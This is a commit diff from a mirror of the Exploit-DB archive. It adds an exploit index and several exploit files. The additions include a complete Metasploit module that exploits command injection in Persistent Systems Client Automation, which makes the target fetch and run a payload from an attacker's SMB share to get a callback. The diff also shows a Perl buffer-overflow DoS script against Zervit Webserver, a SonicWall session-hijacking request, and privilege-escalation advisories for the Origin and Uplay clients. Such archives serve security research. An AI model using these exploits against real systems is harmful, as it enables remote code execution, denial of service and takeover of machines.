bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-01

Browse source 
4 new exploits
This commit is contained in:
Offensive Security 2015-03-01 08:48:12 +00:00
parent d03c02a019
commit d8b2f45cd4
7 changed files with 483 additions and 28 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -143,7 +143,7 @@ id,file,description,date,author,platform,type,port
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21
151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
@ -8222,7 +8222,7 @@ id,file,description,date,author,platform,type,port
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@ -32618,6 +32618,8 @@ id,file,description,date,author,platform,type,port
36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0
36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0
36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0
36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0
36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0
@ -32631,3 +32633,5 @@ id,file,description,date,author,platform,type,port
36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465

Can't render this file because it is too large.

11
platforms/hardware/remote/36205.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/49930/info
SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.
Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.
GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111

46
platforms/windows/dos/8721.pl
View file

@ -1,23 +1,23 @@
#!/usr/bin/perl
# Zervit webserver 0.4 Bof Poc
# make it just for fun :s
use LWP::Simple;
use LWP::UserAgent;
if (@ARGV < 2) {
print("Usage: $0 <url> <port>\n");
print("TARGETS are\n ");
print("Example: perl $0 127.0.0.1 777 \n");
exit(1);
}
($target, $port) = @ARGV;
print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
print("Attacking $target on port $port!\n");
print("Ddossing .......\n");
$dos ="\x41" x 1000 ;
$temp="/" x 2;
my $url= "http://". $target. ":" . $port .$temp . $dos;
$content=get $url;
print("\n Server Bofed");
# milw0rm.com [2009-05-18]
#!/usr/bin/perl
# Zervit webserver 0.4 Bof Poc
# make it just for fun :s
use LWP::Simple;
use LWP::UserAgent;
if (@ARGV < 2) {
print("Usage: $0 <url> <port>\n");
print("TARGETS are\n ");
print("Example: perl $0 127.0.0.1 777 \n");
exit(1);
}
($target, $port) = @ARGV;
print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
print("Attacking $target on port $port!\n");
print("Ddossing .......\n");
$dos ="\x41" x 1000 ;
$temp="/" x 2;
my $url= "http://". $target. ":" . $port .$temp . $dos;
$content=get $url;
print("\n Server Bofed");
# milw0rm.com [2009-05-18]

240
platforms/windows/local/36188.txt Executable file
View file

@ -0,0 +1,240 @@
?Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities
Vendor: Electronic Arts Inc.
Product web page: https://www.origin.com
Affected version: 9.5.5.2850 (353317)
9.5.3.636 (350385)
9.5.2.2829 (348065)
Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution
software from Electronic Arts that allows users to purchase games on the internet
for PC and mobile platforms, and download them with the Origin client (formerly
EA Download Manager, EA Downloader and EA Link).
Desc#1: The application is vulnerable to an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file with a
binary of choice. The vulnerability exist due to the improper permissions,
with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the
'OriginClientService.exe' binary file, and for all the files in the 'Origin'
directory. The service is installed by default to start on system boot with
LocalSystem privileges. Attackers can replace the binary with their rootkit,
and on reboot they get SYSTEM privileges.
Desc#2: Origin client service also suffers from an unquoted search path issue
impacting the 'Origin Client Service' service for Windows deployed as part of
the Origin Thin Setup bundle. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated privileges
on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application startup
or reboot. If successful, the local users code would execute with the elevated
privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5231
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php
14.12.2014
**************************************************************************
C:\>sc qc "Origin Client Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Origin Client Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Origin\OriginClientService.exe <-----< Unquoted path
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Origin Client Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F <-----< Full control
BUILTIN\Users:(ID)F <-----< Full control
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
C:\>
**************************************************************************
**************************************************************************
C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe"
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41
Startup directory:
"C:\"
Arguments Used:
Filename = "C:\Program Files (x86)\Origin\*.exe"
**************************************************************************
File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\igoproxy64.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\Origin.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginClientService.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginER.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginUninstall.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Users Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
No Auditing set
Owner: BUILTIN\Administrators
**************************************************************************
Operation Complete
Elapsed Time: 0,1796875 seconds.
Ending Script at 15.12.2014 19:46:41
C:\>
**************************************************************************
--
**************************************************************************
Changed permissions and service binary path name (vendor fix):
--------------------------------------------------------------
C:\>sc qc "Origin Client Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Origin Client Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Origin\OriginClientService.exe" <-----< Quoted path
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Origin Client Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX) <-----< Read and execute
Successfully processed 1 files; Failed processing 0 files
C:\>
**************************************************************************

49
platforms/windows/local/36189.txt Executable file
View file

@ -0,0 +1,49 @@
?
Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation
Vendor: Ubisoft Entertainment S.A.
Product web page: http://www.ubi.com
Affected version: 5.0.0.3914 (PC)
Summary: Uplay is a digital distribution, digital rights management,
multiplayer and communications service created by Ubisoft to provide
an experience similar to the achievements/trophies offered by various
other game companies.
- Uplay PC is a desktop client which replaces individual game launchers
previously used for Ubisoft games. With Uplay PC, you have all your Uplay
enabled games and Uplay services in the same place and you get access to
a whole new set of features for your PC games.
Desc: Uplay for PC suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'F' flag (Full) for 'Users' group, making the
entire directory 'Ubisoft Game Launcher' and its files and sub-dirs
world-writable.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5230
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php
Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay
19.02.2015
--
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
test-PC\yousir:(ID)F
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>

6
platforms/windows/remote/151.txt
View file

@ -36,6 +36,6 @@ function backbutton() {
// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();
# milw0rm.com [2004-02-04]
# milw0rm.com [2004-02-04]

151
platforms/windows/remote/36206.rb Executable file
View file

@ -0,0 +1,151 @@
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB
include Msf::Exploit::EXE
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::Client
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author' => [ 'Ben Turner' ],
'License' => BSD_LICENSE,
'References' =>
[
],
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'process'
},
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Platform' => ['win'],
'Targets' =>
[
[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'January 10 2014'
)
register_options([
OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
Opt::RPORT(3465),
], self.class)
end
def exploit
createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
createservice << "\x22\x00\x00\x00"
startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
startservice << "Nvdkit service start test"
startservice << "\x22\x00\x00\x00"
removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
removeservice << "Nvdkit service remove test"
removeservice << "\x22\x00\x00\x00"
def filedrop()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
exe = generate_payload_exe
fd = smb_open("\\installservice.exe", 'rwct')
fd << exe
fd.close
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end
def filetest()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
file = "\\installservice.exe"
filetest = smb_file_exist?(file)
if filetest
print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
else
print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
end
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end
begin
filedrop()
filetest()
connect()
sock.put(createservice)
print_status("Creating the callback payload and installing the remote service")
disconnect
sleep(5)
connect()
sock.put(startservice)
print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
disconnect
sleep(30)
connect
sock.put(removeservice)
disconnect
rescue ::Exception => e
print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
abort()
end
end
end